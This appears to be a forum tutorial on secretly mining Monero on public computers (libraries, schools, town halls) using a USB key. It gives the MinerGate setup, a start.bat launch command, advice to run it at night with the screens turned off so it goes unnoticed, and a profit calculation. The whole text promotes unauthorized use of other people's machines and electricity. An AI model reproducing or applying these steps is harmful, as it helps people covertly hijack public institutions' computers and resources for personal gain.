We will generate money via our USB key and 2, 3 specially made tips.
Monero / Etherum / BitCoin / ... on as many computers as possible without having admin access.
Materials required :
- A USB Key (any size, minimum 1 Giga.)
- MinerGate Software : Console version under Windows but to be seen depending on the computer(s) concerned.
- Search for free access computers (Library, School, Town Hall,...)
Tutorial:
First, create an account on the MinerGate website : https://fr.minergate.com/ .
Then, Install the console version (in my case Windows) : https://fr.minergate.com/downloads/console
Once installed, you need to extract the ZIP file and export it to your USB Key.
Once on the USB Key, create a .bat file, you will name it: start.bat
(If you can't create a .bat file, it's simple : you just have to create a text document in .txt, save it as, rename it to : start.bat, and don't forget to put "All files" instead of "Text document" just below)
After that, you will do: Right click on start.bat, Modify, a text document opens. In the document, you will type :
minergate-cli --user votreadressee-mail.de.votrecompteminergate@email.com --xmr 3
Some will understand, others won't.
Let me explain:
"minergate-cli" means we're going to launch the MinerGate application.
"--user votreadressee-mail.de.votrecompteminergate@email.com" means we want the miner money to go to our MinerGate account.
"--xmr 3" means that we want to mine Monero at power: 3. For computers, the weakest ones, set power 2, see 1, but your gain will be reduced.
Power (Minimum:1- Maximum: 7 (for PC Gamers))
Save your .bat file.
Test start.bat on your computer by running it on your computer. If it works and a message of mining appears all is well, if not come PV, you have on made a blunder.
Now, let's go to practice:
Personally, I've tried it in a library of 10 computers together.
With any luck, do it at night around 8:00 when it's a little crowded.
Go on each computer, drag and drop your specially created folder on all computers and manually launch "start.bat".
Once you launch, if a normal mining message appears, everything is fine.
Just turn off the screen and come back tomorrow morning or when the library opens to close the programs. And voila! You've been mining Monero all night !
Since we only undermined on the CPU, we made little money per device. But the addition of all this is going to make us a lot of money.
Small Calculation :
One night from 8pm to 10am = 2pm.
A PC in 1 hour can mine = 0.000287 XMR
14 x 0.000287 = 0.004018
We have 10 computers : 10 x 0.004018 = 0.04018
0.04018 XMR = 5 Euro
So, we make 5 Euro a night mining on public computers by inserting a mining file.
